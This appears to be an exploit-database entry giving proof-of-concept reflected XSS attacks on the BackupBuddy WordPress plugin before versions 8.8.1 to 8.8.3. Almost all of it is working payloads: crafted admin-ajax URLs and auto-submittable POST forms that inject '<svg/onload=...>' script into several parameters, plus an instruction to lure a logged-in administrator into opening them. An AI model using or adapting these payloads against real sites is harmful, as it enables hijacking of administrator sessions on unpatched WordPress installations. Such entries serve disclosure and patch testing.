Share
## https://sploitus.com/exploit?id=WPEX-ID:7B0EEAFE-B9BC-43B2-8487-A23D3960F73F
Make a logged in admin/SA open one of the URL below:
v < 8.8.3
<form action="https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=migrate_status" method="POST">
<input type="text" name="step" value="<svg/onload=alert(/XSS/)>">
<input type="submit" name="submit" value="submit">
</form>
<form action="https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=remote_send" method="POST">
<input type="text" name="file" value="<svg/onload=alert(/XSS/)>">
<input type="submit" name="submit" value="submit">
</form>
https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=restore_file_view&archive=--!><svg/onload=alert(/XSS/)>-
https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=restore_file_view&file=--!><svg/onload=alert(/XSS/)>-
v < 8.8.2
https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=view_log&serial="><svg/onload=alert(/XSS/)>
v < 8.8.1
https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=</script><svg/onload=alert(/XSS/)>
http:/example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&sending=%3C/script%3E%3Csvg/onload=alert(/XSS/)%3E